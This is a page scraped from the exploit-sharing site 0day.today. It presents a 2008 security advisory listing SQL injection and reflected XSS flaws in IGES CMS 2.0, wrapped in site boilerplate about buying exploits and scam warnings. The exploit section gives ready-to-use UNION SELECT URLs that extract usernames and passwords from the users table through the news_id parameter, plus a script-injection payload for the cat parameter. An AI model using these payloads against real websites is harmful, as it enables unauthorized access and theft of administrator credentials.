0day.today －世界最大的漏洞利用数据库。

选择语言:

0day.today 用户须知:

我们唯一的域名：http://0day.today
我们大多数的材料都完全免费
如果你想购买漏洞利用 / 获取V.I.P.权限或者使用其他付费服务，
你需要购买或者赢取金币金币

We accept currencies: [contact admin to find more]

我们不希望本站被用于黑客用途。一经查实用户有任何形式的非法访问行为，此用户的账户和数据会被从本站删除。

本站管理员使用官方账号。请谨防诈骗！

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

我已经是 0day.today 注册用户。不要再显示此信息。

进站须知

请读 [ 协议 ]
请读 [ 提交 ] 规则
请访问 [ 常见问题 ] 页
[ 注册 ] 用户信息
获取 [ 金币 ]
如果你想要 [ 出售 ]
如果你想要 [ 购买 ]
如果你丢失了 [ 账户 ]
如有任何问题 [ [email protected] ]

主链接

你可以由此方式联系我们

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ 授权 ] [ 注册 ] [ 恢复账号 ]

你可以由此方式联系我们:

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

IGES CMS <= 2.0 (XSS/SQL) Multiple Remote Vulnerabilities

作者

0day Today Team

风险

[

安全风险级别－未分类

]

0day-ID

0day-ID-3506

类别

web applications

添加日期

04-08-2008

平台

unsorted

=========================================================
IGES CMS <= 2.0 (XSS/SQL) Multiple Remote Vulnerabilities
=========================================================


###################################################################################
#
#        AmnPardaz Security Research Team
#
# Title: IGES CMS <=2.0 Multiple Vulnerabilities
# Vendor: www.iges.nl
# Exploit: Available
# Vulnerable Version: 2.0
# Impact: High
# Fix: N/A
###################################################################################

####################
1. Description:
####################

    IGES CMS is a complete, fully featured CMS in PHP language with SQL and became a powerful CMS having plenty of strong modules.
    This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites.

####################
2. Vulnerabilities:
####################

    2.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
        2.1.1. Exploit:
                        Check the exploit/POC section.
    2.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
        2.2.1. Exploit:
                        Check the exploit/POC section.

####################
3. Exploits/POCs:
####################

1. Exploits/POCs:
	1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
		-------------
		Find Admin's password:
		http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
		http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*
		-------------
		1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
		-------------
		http://[URL]/links.php?cat=<script>alert(/XSS/.source)</script>
		-------------

####################
4. Solution:
####################

    Edit the source code to ensure that inputs are properly sanitized.





#  0day.today [2024-07-04]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

IGES CMS <= 2.0 (XSS/SQL) Multiple Remote Vulnerabilities

报告错误

报告错误